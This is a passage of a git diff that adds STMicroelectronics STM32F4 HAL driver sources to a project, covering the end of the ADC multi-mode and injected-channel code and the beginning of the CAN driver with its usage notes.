ADC peripheral is disabled in order to enable it and wait during + Tstab time the ADC's stabilization */ + if((hadc->Instance->CR2 & ADC_CR2_ADON) != ADC_CR2_ADON) + { + /* Enable the Peripheral */ + __HAL_ADC_ENABLE(hadc); + + /* Delay for temperature sensor stabilization time */ + /* Compute number of CPU cycles to wait for */ + counter = (ADC_STAB_DELAY_US * (SystemCoreClock / 1000000U)); + while(counter != 0U) + { + counter--; + } + } + + /* Start conversion if ADC is effectively enabled */ + if(HAL_IS_BIT_SET(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Set ADC state */ + /* - Clear state bitfield related to regular group conversion results */ + /* - Set state bitfield related to regular group operation */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_READY | HAL_ADC_STATE_REG_EOC | HAL_ADC_STATE_REG_OVR, + HAL_ADC_STATE_REG_BUSY); + + /* If conversions on group regular are also triggering group injected, */ + /* update ADC state. */ + if (READ_BIT(hadc->Instance->CR1, ADC_CR1_JAUTO) != RESET) + { + ADC_STATE_CLR_SET(hadc->State, HAL_ADC_STATE_INJ_EOC, HAL_ADC_STATE_INJ_BUSY); + } + + /* State machine update: Check if an injected conversion is ongoing */ + if (HAL_IS_BIT_SET(hadc->State, HAL_ADC_STATE_INJ_BUSY)) + { + /* Reset ADC error code fields related to conversions on group regular */ + CLEAR_BIT(hadc->ErrorCode, (HAL_ADC_ERROR_OVR | HAL_ADC_ERROR_DMA)); + } + else + { + /* Reset ADC all error code fields */ + ADC_CLEAR_ERRORCODE(hadc); + } + + /* Process unlocked */ + /* Unlock before starting ADC conversions: in case of potential */ + /* interruption, to let the process to ADC IRQ Handler. */ + __HAL_UNLOCK(hadc); + + /* Set the DMA transfer complete callback */ + hadc->DMA_Handle->XferCpltCallback = ADC_MultiModeDMAConvCplt; + + /* Set the DMA half transfer complete callback */ + hadc->DMA_Handle->XferHalfCpltCallback = ADC_MultiModeDMAHalfConvCplt; + + /* Set the DMA error callback */ + hadc->DMA_Handle->XferErrorCallback = ADC_MultiModeDMAError ; + + /* Manage ADC and DMA start: ADC overrun interruption, DMA start, ADC */ + /* start (in case of SW start): */ + + /* Clear regular group conversion flag and overrun flag */ + /* (To ensure of no unknown state from potential previous ADC operations) */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_EOC); + + /* Enable ADC overrun interrupt */ + __HAL_ADC_ENABLE_IT(hadc, ADC_IT_OVR); + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADC and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + if (hadc->Init.DMAContinuousRequests != DISABLE) + { + /* Enable the selected ADC DMA request after last transfer */ + tmpADC_Common->CCR |= ADC_CCR_DDS; + } + else + { + /* Disable the selected ADC EOC rising on each regular channel conversion */ + tmpADC_Common->CCR &= ~ADC_CCR_DDS; + } + + /* Enable the DMA Stream */ + HAL_DMA_Start_IT(hadc->DMA_Handle, (uint32_t)&tmpADC_Common->CDR, (uint32_t)pData, Length); + + /* if no external trigger present enable software conversion of regular channels */ + if((hadc->Instance->CR2 & ADC_CR2_EXTEN) == RESET) + { + /* Enable the selected ADC software conversion for regular group */ + hadc->Instance->CR2 |= (uint32_t)ADC_CR2_SWSTART; + } + } + else + { + /* Update ADC state machine to error */ + SET_BIT(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL); + + /* Set ADC error code to ADC IP internal error */ + SET_BIT(hadc->ErrorCode, HAL_ADC_ERROR_INTERNAL); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Disables ADC DMA (multi-ADC mode) and disables ADC peripheral + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADCEx_MultiModeStop_DMA(ADC_HandleTypeDef* hadc) +{ + HAL_StatusTypeDef tmp_hal_status = HAL_OK; + ADC_Common_TypeDef *tmpADC_Common; + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(hadc->Instance)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Stop potential conversion on going, on regular and injected groups */ + /* Disable ADC peripheral */ + __HAL_ADC_DISABLE(hadc); + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADC and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* Check if ADC is effectively disabled */ + if(HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Disable the selected ADC DMA mode for multimode */ + tmpADC_Common->CCR &= ~ADC_CCR_DDS; + + /* Disable the DMA channel (in case of DMA in circular mode or stop while */ + /* DMA transfer is on going) */ + tmp_hal_status = HAL_DMA_Abort(hadc->DMA_Handle); + + /* Disable ADC overrun interrupt */ + __HAL_ADC_DISABLE_IT(hadc, ADC_IT_OVR); + + /* Set ADC state */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_REG_BUSY | HAL_ADC_STATE_INJ_BUSY, + HAL_ADC_STATE_READY); + } + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return tmp_hal_status; +} + +/** + * @brief Returns the last ADC1, ADC2 and ADC3 regular conversions results + * data in the selected multi mode. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval The converted data value. + */ +uint32_t HAL_ADCEx_MultiModeGetValue(ADC_HandleTypeDef* hadc) +{ + ADC_Common_TypeDef *tmpADC_Common; + UNUSED(hadc); // TODO: check if not breaks something! + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADC and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* Return the multi mode conversion value */ + return tmpADC_Common->CDR; +} + +/** + * @brief Injected conversion complete callback in non blocking mode + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval None + */ +__weak void HAL_ADCEx_InjectedConvCpltCallback(ADC_HandleTypeDef* hadc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hadc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ADC_InjectedConvCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Configures for the selected ADC injected channel its corresponding + * rank in the sequencer and its sample time. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param sConfigInjected ADC configuration structure for injected channel. + * @retval None + */ +HAL_StatusTypeDef HAL_ADCEx_InjectedConfigChannel(ADC_HandleTypeDef* hadc, ADC_InjectionConfTypeDef* sConfigInjected) +{ + +#ifdef USE_FULL_ASSERT + uint32_t tmp = 0U; + +#endif /* USE_FULL_ASSERT */ + + ADC_Common_TypeDef *tmpADC_Common; + + /* Check the parameters */ + assert_param(IS_ADC_CHANNEL(sConfigInjected->InjectedChannel)); + assert_param(IS_ADC_INJECTED_RANK(sConfigInjected->InjectedRank)); + assert_param(IS_ADC_SAMPLE_TIME(sConfigInjected->InjectedSamplingTime)); + assert_param(IS_ADC_EXT_INJEC_TRIG(sConfigInjected->ExternalTrigInjecConv)); + assert_param(IS_ADC_INJECTED_LENGTH(sConfigInjected->InjectedNbrOfConversion)); + assert_param(IS_FUNCTIONAL_STATE(sConfigInjected->AutoInjectedConv)); + assert_param(IS_FUNCTIONAL_STATE(sConfigInjected->InjectedDiscontinuousConvMode)); + +#ifdef USE_FULL_ASSERT + tmp = ADC_GET_RESOLUTION(hadc); + assert_param(IS_ADC_RANGE(tmp, sConfigInjected->InjectedOffset)); +#endif /* USE_FULL_ASSERT */ + + if(sConfigInjected->ExternalTrigInjecConv != ADC_INJECTED_SOFTWARE_START) + { + assert_param(IS_ADC_EXT_INJEC_TRIG_EDGE(sConfigInjected->ExternalTrigInjecConvEdge)); + } + + /* Process locked */ + __HAL_LOCK(hadc); + + /* if ADC_Channel_10 ... ADC_Channel_18 is selected */ + if (sConfigInjected->InjectedChannel > ADC_CHANNEL_9) + { + /* Clear the old sample time */ + hadc->Instance->SMPR1 &= ~ADC_SMPR1(ADC_SMPR1_SMP10, sConfigInjected->InjectedChannel); + + /* Set the new sample time */ + hadc->Instance->SMPR1 |= ADC_SMPR1(sConfigInjected->InjectedSamplingTime, sConfigInjected->InjectedChannel); + } + else /* ADC_Channel include in ADC_Channel_[0..9] */ + { + /* Clear the old sample time */ + hadc->Instance->SMPR2 &= ~ADC_SMPR2(ADC_SMPR2_SMP0, sConfigInjected->InjectedChannel); + + /* Set the new sample time */ + hadc->Instance->SMPR2 |= ADC_SMPR2(sConfigInjected->InjectedSamplingTime, sConfigInjected->InjectedChannel); + } + + /*---------------------------- ADCx JSQR Configuration -----------------*/ + hadc->Instance->JSQR &= ~(ADC_JSQR_JL); + hadc->Instance->JSQR |= ADC_SQR1(sConfigInjected->InjectedNbrOfConversion); + + /* Rank configuration */ + + /* Clear the old SQx bits for the selected rank */ + hadc->Instance->JSQR &= ~ADC_JSQR(ADC_JSQR_JSQ1, sConfigInjected->InjectedRank,sConfigInjected->InjectedNbrOfConversion); + + /* Set the SQx bits for the selected rank */ + hadc->Instance->JSQR |= ADC_JSQR(sConfigInjected->InjectedChannel, sConfigInjected->InjectedRank,sConfigInjected->InjectedNbrOfConversion); + + /* Enable external trigger if trigger selection is different of software */ + /* start. */ + /* Note: This configuration keeps the hardware feature of parameter */ + /* ExternalTrigConvEdge "trigger edge none" equivalent to */ + /* software start. */ + if(sConfigInjected->ExternalTrigInjecConv != ADC_INJECTED_SOFTWARE_START) + { + /* Select external trigger to start conversion */ + hadc->Instance->CR2 &= ~(ADC_CR2_JEXTSEL); + hadc->Instance->CR2 |= sConfigInjected->ExternalTrigInjecConv; + + /* Select external trigger polarity */ + hadc->Instance->CR2 &= ~(ADC_CR2_JEXTEN); + hadc->Instance->CR2 |= sConfigInjected->ExternalTrigInjecConvEdge; + } + else + { + /* Reset the external trigger */ + hadc->Instance->CR2 &= ~(ADC_CR2_JEXTSEL); + hadc->Instance->CR2 &= ~(ADC_CR2_JEXTEN); + } + + if (sConfigInjected->AutoInjectedConv != DISABLE) + { + /* Enable the selected ADC automatic injected group conversion */ + hadc->Instance->CR1 |= ADC_CR1_JAUTO; + } + else + { + /* Disable the selected ADC automatic injected group conversion */ + hadc->Instance->CR1 &= ~(ADC_CR1_JAUTO); + } + + if (sConfigInjected->InjectedDiscontinuousConvMode != DISABLE) + { + /* Enable the selected ADC injected discontinuous mode */ + hadc->Instance->CR1 |= ADC_CR1_JDISCEN; + } + else + { + /* Disable the selected ADC injected discontinuous mode */ + hadc->Instance->CR1 &= ~(ADC_CR1_JDISCEN); + } + + switch(sConfigInjected->InjectedRank) + { + case 1U: + /* Set injected channel 1 offset */ + hadc->Instance->JOFR1 &= ~(ADC_JOFR1_JOFFSET1); + hadc->Instance->JOFR1 |= sConfigInjected->InjectedOffset; + break; + case 2U: + /* Set injected channel 2 offset */ + hadc->Instance->JOFR2 &= ~(ADC_JOFR2_JOFFSET2); + hadc->Instance->JOFR2 |= sConfigInjected->InjectedOffset; + break; + case 3U: + /* Set injected channel 3 offset */ + hadc->Instance->JOFR3 &= ~(ADC_JOFR3_JOFFSET3); + hadc->Instance->JOFR3 |= sConfigInjected->InjectedOffset; + break; + default: + /* Set injected channel 4 offset */ + hadc->Instance->JOFR4 &= ~(ADC_JOFR4_JOFFSET4); + hadc->Instance->JOFR4 |= sConfigInjected->InjectedOffset; + break; + } + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADC and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* if ADC1 Channel_18 is selected enable VBAT Channel */ + if ((hadc->Instance == ADC1) && (sConfigInjected->InjectedChannel == ADC_CHANNEL_VBAT)) + { + /* Enable the VBAT channel*/ + tmpADC_Common->CCR |= ADC_CCR_VBATE; + } + + /* if ADC1 Channel_16 or Channel_17 is selected enable TSVREFE Channel(Temperature sensor and VREFINT) */ + if ((hadc->Instance == ADC1) && ((sConfigInjected->InjectedChannel == ADC_CHANNEL_TEMPSENSOR) || (sConfigInjected->InjectedChannel == ADC_CHANNEL_VREFINT))) + { + /* Enable the TSVREFE channel*/ + tmpADC_Common->CCR |= ADC_CCR_TSVREFE; + } + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Configures the ADC multi-mode + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param multimode pointer to an ADC_MultiModeTypeDef structure that contains + * the configuration information for multimode. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADCEx_MultiModeConfigChannel(ADC_HandleTypeDef* hadc, ADC_MultiModeTypeDef* multimode) +{ + + ADC_Common_TypeDef *tmpADC_Common; + + /* Check the parameters */ + assert_param(IS_ADC_MODE(multimode->Mode)); + assert_param(IS_ADC_DMA_ACCESS_MODE(multimode->DMAAccessMode)); + assert_param(IS_ADC_SAMPLING_DELAY(multimode->TwoSamplingDelay)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADC and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* Set ADC mode */ + tmpADC_Common->CCR &= ~(ADC_CCR_MULTI); + tmpADC_Common->CCR |= multimode->Mode; + + /* Set the ADC DMA access mode */ + tmpADC_Common->CCR &= ~(ADC_CCR_DMA); + tmpADC_Common->CCR |= multimode->DMAAccessMode; + + /* Set delay between two sampling phases */ + tmpADC_Common->CCR &= ~(ADC_CCR_DELAY); + tmpADC_Common->CCR |= multimode->TwoSamplingDelay; + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** + * @brief DMA transfer complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void ADC_MultiModeDMAConvCplt(DMA_HandleTypeDef *hdma) +{ + /* Retrieve ADC handle corresponding to current DMA handle */ + ADC_HandleTypeDef* hadc = ( ADC_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + /* Update state machine on conversion status if not in error state */ + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL | HAL_ADC_STATE_ERROR_DMA)) + { + /* Update ADC state machine */ + SET_BIT(hadc->State, HAL_ADC_STATE_REG_EOC); + + /* Determine whether any further conversion upcoming on group regular */ + /* by external trigger, continuous mode or scan sequence on going. */ + /* Note: On STM32F4, there is no independent flag of end of sequence. */ + /* The test of scan sequence on going is done either with scan */ + /* sequence disabled or with end of conversion flag set to */ + /* of end of sequence. */ + if(ADC_IS_SOFTWARE_START_REGULAR(hadc) && + (hadc->Init.ContinuousConvMode == DISABLE) && + (HAL_IS_BIT_CLR(hadc->Instance->SQR1, ADC_SQR1_L) || + HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_EOCS) ) ) + { + /* Disable ADC end of single conversion interrupt on group regular */ + /* Note: Overrun interrupt was enabled with EOC interrupt in */ + /* HAL_ADC_Start_IT(), but is not disabled here because can be used */ + /* by overrun IRQ process below. */ + __HAL_ADC_DISABLE_IT(hadc, ADC_IT_EOC); + + /* Set ADC state */ + CLEAR_BIT(hadc->State, HAL_ADC_STATE_REG_BUSY); + + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_INJ_BUSY)) + { + SET_BIT(hadc->State, HAL_ADC_STATE_READY); + } + } + + /* Conversion complete callback */ + HAL_ADC_ConvCpltCallback(hadc); + } + else + { + /* Call DMA error callback */ + hadc->DMA_Handle->XferErrorCallback(hdma); + } +} + +/** + * @brief DMA half transfer complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void ADC_MultiModeDMAHalfConvCplt(DMA_HandleTypeDef *hdma) +{ + ADC_HandleTypeDef* hadc = ( ADC_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + /* Conversion complete callback */ + HAL_ADC_ConvHalfCpltCallback(hadc); +} + +/** + * @brief DMA error callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void ADC_MultiModeDMAError(DMA_HandleTypeDef *hdma) +{ + ADC_HandleTypeDef* hadc = ( ADC_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + hadc->State= HAL_ADC_STATE_ERROR_DMA; + /* Set ADC error code to DMA error */ + hadc->ErrorCode |= HAL_ADC_ERROR_DMA; + HAL_ADC_ErrorCallback(hadc); +} + +/** + * @} + */ + +#endif /* HAL_ADC_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_can.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_can.c new file mode 100644 index 000000000..3e0347580 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_can.c @@ -0,0 +1,2464 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_can.c + * @author MCD Application Team + * @brief CAN HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Controller Area Network (CAN) peripheral: + * + Initialization and de-initialization functions + * + Configuration functions + * + Control functions + * + Interrupts management + * + Callbacks functions + * + Peripheral State and Error functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + (#) Initialize the CAN low level resources by implementing the + HAL_CAN_MspInit(): + (++) Enable the CAN interface clock using __HAL_RCC_CANx_CLK_ENABLE() + (++) Configure CAN pins + (+++) Enable the clock for the CAN GPIOs + (+++) Configure CAN pins as alternate function open-drain + (++) In case of using interrupts (e.g. HAL_CAN_ActivateNotification()) + (+++) Configure the CAN interrupt priority using + HAL_NVIC_SetPriority() + (+++) Enable the CAN IRQ handler using HAL_NVIC_EnableIRQ() + (+++) In CAN IRQ handler, call HAL_CAN_IRQHandler() + + (#) Initialize the CAN peripheral using HAL_CAN_Init() function. This + function resorts to HAL_CAN_MspInit() for low-level initialization. + + (#) Configure the reception filters using the following configuration + functions: + (++) HAL_CAN_ConfigFilter() + + (#) Start the CAN module using HAL_CAN_Start() function. At this level + the node is active on the bus: it receive messages, and can send + messages. + + (#) To manage messages transmission, the following Tx control functions + can be used: + (++) HAL_CAN_AddTxMessage() to request transmission of a new + message. + (++) HAL_CAN_AbortTxRequest() to abort transmission of a pending + message. + (++) HAL_CAN_GetTxMailboxesFreeLevel() to get the number of free Tx + mailboxes. + (++) HAL_CAN_IsTxMessagePending() to check if a message is pending + in a Tx mailbox. + (++) HAL_CAN_GetTxTimestamp() to get the timestamp of Tx message + sent, if time triggered communication mode is enabled. + + (#) When a message is received into the CAN Rx FIFOs, it can be retrieved + using the HAL_CAN_GetRxMessage() function. The function + HAL_CAN_GetRxFifoFillLevel() allows to know how many Rx message are + stored in the Rx Fifo. + + (#) Calling the HAL_CAN_Stop() function stops the CAN module. + + (#) The deinitialization is achieved with HAL_CAN_DeInit() function. + + + *** Polling mode operation *** + ============================== + [..] + (#) Reception: + (++) Monitor reception of message using HAL_CAN_GetRxFifoFillLevel() + until at least one message is received. + (++) Then get the message using HAL_CAN_GetRxMessage(). + + (#) Transmission: + (++) Monitor the Tx mailboxes availability until at least one Tx + mailbox is free, using HAL_CAN_GetTxMailboxesFreeLevel(). + (++) Then request transmission of a message using + HAL_CAN_AddTxMessage(). + + + *** Interrupt mode operation *** + ================================ + [..] + (#) Notifications are activated using HAL_CAN_ActivateNotification() + function. Then, the process can be controlled through the + available user callbacks: HAL_CAN_xxxCallback(), using same APIs + HAL_CAN_GetRxMessage() and HAL_CAN_AddTxMessage(). + + (#) Notifications can be deactivated using + HAL_CAN_DeactivateNotification() function. + + (#) Special care should be taken for CAN_IT_RX_FIFO0_MSG_PENDING and + CAN_IT_RX_FIFO1_MSG_PENDING notifications. These notifications trig + the callbacks HAL_CAN_RxFIFO0MsgPendingCallback() and + HAL_CAN_RxFIFO1MsgPendingCallback(). User has two possible options + here. + (++) Directly get the Rx message in the callback, using + HAL_CAN_GetRxMessage(). + (++) Or deactivate the notification in the callback without + getting the Rx message. The Rx message can then be got later + using HAL_CAN_GetRxMessage(). Once the Rx message have been + read, the notification can be activated again. + + + *** Sleep mode *** + ================== + [..] + (#) The CAN peripheral can be put in sleep mode (low power), using + HAL_CAN_RequestSleep(). The sleep mode will be entered as soon as the + current CAN activity (transmission or reception of a CAN frame) will + be completed. + + (#) A notification can be activated to be informed when the sleep mode + will be entered. + + (#) It can be checked if the sleep mode is entered using + HAL_CAN_IsSleepActive(). + Note that the CAN state (accessible from the API HAL_CAN_GetState()) + is HAL_CAN_STATE_SLEEP_PENDING as soon as the sleep mode request is + submitted (the sleep mode is not yet entered), and become + HAL_CAN_STATE_SLEEP_ACTIVE when the sleep mode is effective. + + (#) The wake-up from sleep mode can be triggered by two ways: + (++) Using HAL_CAN_WakeUp(). When returning from this function, + the sleep mode is exited (if return status is HAL_OK). + (++) When a start of Rx CAN frame is detected by the CAN peripheral, + if automatic wake up mode is enabled. + + *** Callback registration *** + ============================================= + + The compilation define USE_HAL_CAN_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use Function HAL_CAN_RegisterCallback() to register an interrupt callback. + + Function HAL_CAN_RegisterCallback() allows to register following callbacks: + (+) TxMailbox0CompleteCallback : Tx Mailbox 0 Complete Callback. + (+) TxMailbox1CompleteCallback : Tx Mailbox 1 Complete Callback. + (+) TxMailbox2CompleteCallback : Tx Mailbox 2 Complete Callback. + (+) TxMailbox0AbortCallback : Tx Mailbox 0 Abort Callback. + (+) TxMailbox1AbortCallback : Tx Mailbox 1 Abort Callback. + (+) TxMailbox2AbortCallback : Tx Mailbox 2 Abort Callback. + (+) RxFifo0MsgPendingCallback : Rx Fifo 0 Message Pending Callback. + (+) RxFifo0FullCallback : Rx Fifo 0 Full Callback. + (+) RxFifo1MsgPendingCallback : Rx Fifo 1 Message Pending Callback. + (+) RxFifo1FullCallback : Rx Fifo 1 Full Callback. + (+) SleepCallback : Sleep Callback. + (+) WakeUpFromRxMsgCallback : Wake Up From Rx Message Callback. + (+) ErrorCallback : Error Callback. + (+) MspInitCallback : CAN MspInit. + (+) MspDeInitCallback : CAN MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function HAL_CAN_UnRegisterCallback() to reset a callback to the default + weak function. + HAL_CAN_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) TxMailbox0CompleteCallback : Tx Mailbox 0 Complete Callback. + (+) TxMailbox1CompleteCallback : Tx Mailbox 1 Complete Callback. + (+) TxMailbox2CompleteCallback : Tx Mailbox 2 Complete Callback. + (+) TxMailbox0AbortCallback : Tx Mailbox 0 Abort Callback. + (+) TxMailbox1AbortCallback : Tx Mailbox 1 Abort Callback. + (+) TxMailbox2AbortCallback : Tx Mailbox 2 Abort Callback. + (+) RxFifo0MsgPendingCallback : Rx Fifo 0 Message Pending Callback. + (+) RxFifo0FullCallback : Rx Fifo 0 Full Callback. + (+) RxFifo1MsgPendingCallback : Rx Fifo 1 Message Pending Callback. + (+) RxFifo1FullCallback : Rx Fifo 1 Full Callback. + (+) SleepCallback : Sleep Callback. + (+) WakeUpFromRxMsgCallback : Wake Up From Rx Message Callback. + (+) ErrorCallback : Error Callback. + (+) MspInitCallback : CAN MspInit. + (+) MspDeInitCallback : CAN MspDeInit. + + By default, after the HAL_CAN_Init() and when the state is HAL_CAN_STATE_RESET, + all callbacks are set to the corresponding weak functions: + example HAL_CAN_ErrorCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak function in the HAL_CAN_Init()/ HAL_CAN_DeInit() only when + these callbacks are null (not registered beforehand). + if not, MspInit or MspDeInit are not null, the HAL_CAN_Init()/ HAL_CAN_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in HAL_CAN_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_CAN_STATE_READY or HAL_CAN_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_CAN_RegisterCallback() before calling HAL_CAN_DeInit() + or HAL_CAN_Init() function. + + When The compilation define USE_HAL_CAN_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#if defined(CAN1) + +/** @defgroup CAN CAN + * @brief CAN driver modules + * @{ + */ + +#ifdef HAL_CAN_MODULE_ENABLED + +#ifdef HAL_CAN_LEGACY_MODULE_ENABLED + #error "The CAN driver cannot be used with its legacy, Please enable only one CAN module at once" +#endif + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @defgroup CAN_Private_Constants CAN Private Constants + * @{ + */ +#define CAN_TIMEOUT_VALUE 10U +/** + * @} + */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup CAN_Exported_Functions CAN Exported Functions + * @{ + */ + +/** @defgroup CAN_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and de-initialization functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) HAL_CAN_Init : Initialize and configure the CAN. + (+) HAL_CAN_DeInit : De-initialize the CAN. + (+) HAL_CAN_MspInit : Initialize the CAN MSP. + (+) HAL_CAN_MspDeInit : DeInitialize the CAN MSP. + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the CAN peripheral according to the specified + * parameters in the CAN_InitStruct. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_Init(CAN_HandleTypeDef *hcan) +{ + uint32_t tickstart; + + /* Check CAN handle */ + if (hcan == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_CAN_ALL_INSTANCE(hcan->Instance)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.TimeTriggeredMode)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.AutoBusOff)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.AutoWakeUp)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.AutoRetransmission)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.ReceiveFifoLocked)); + assert_param(IS_FUNCTIONAL_STATE(hcan->Init.TransmitFifoPriority)); + assert_param(IS_CAN_MODE(hcan->Init.Mode)); + assert_param(IS_CAN_SJW(hcan->Init.SyncJumpWidth)); + assert_param(IS_CAN_BS1(hcan->Init.TimeSeg1)); + assert_param(IS_CAN_BS2(hcan->Init.TimeSeg2)); + assert_param(IS_CAN_PRESCALER(hcan->Init.Prescaler)); + +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + if (hcan->State == HAL_CAN_STATE_RESET) + { + /* Reset callbacks to legacy functions */ + hcan->RxFifo0MsgPendingCallback = HAL_CAN_RxFifo0MsgPendingCallback; /* Legacy weak RxFifo0MsgPendingCallback */ + hcan->RxFifo0FullCallback = HAL_CAN_RxFifo0FullCallback; /* Legacy weak RxFifo0FullCallback */ + hcan->RxFifo1MsgPendingCallback = HAL_CAN_RxFifo1MsgPendingCallback; /* Legacy weak RxFifo1MsgPendingCallback */ + hcan->RxFifo1FullCallback = HAL_CAN_RxFifo1FullCallback; /* Legacy weak RxFifo1FullCallback */ + hcan->TxMailbox0CompleteCallback = HAL_CAN_TxMailbox0CompleteCallback; /* Legacy weak TxMailbox0CompleteCallback */ + hcan->TxMailbox1CompleteCallback = HAL_CAN_TxMailbox1CompleteCallback; /* Legacy weak TxMailbox1CompleteCallback */ + hcan->TxMailbox2CompleteCallback = HAL_CAN_TxMailbox2CompleteCallback; /* Legacy weak TxMailbox2CompleteCallback */ + hcan->TxMailbox0AbortCallback = HAL_CAN_TxMailbox0AbortCallback; /* Legacy weak TxMailbox0AbortCallback */ + hcan->TxMailbox1AbortCallback = HAL_CAN_TxMailbox1AbortCallback; /* Legacy weak TxMailbox1AbortCallback */ + hcan->TxMailbox2AbortCallback = HAL_CAN_TxMailbox2AbortCallback; /* Legacy weak TxMailbox2AbortCallback */ + hcan->SleepCallback = HAL_CAN_SleepCallback; /* Legacy weak SleepCallback */ + hcan->WakeUpFromRxMsgCallback = HAL_CAN_WakeUpFromRxMsgCallback; /* Legacy weak WakeUpFromRxMsgCallback */ + hcan->ErrorCallback = HAL_CAN_ErrorCallback; /* Legacy weak ErrorCallback */ + + if (hcan->MspInitCallback == NULL) + { + hcan->MspInitCallback = HAL_CAN_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware: CLOCK, NVIC */ + 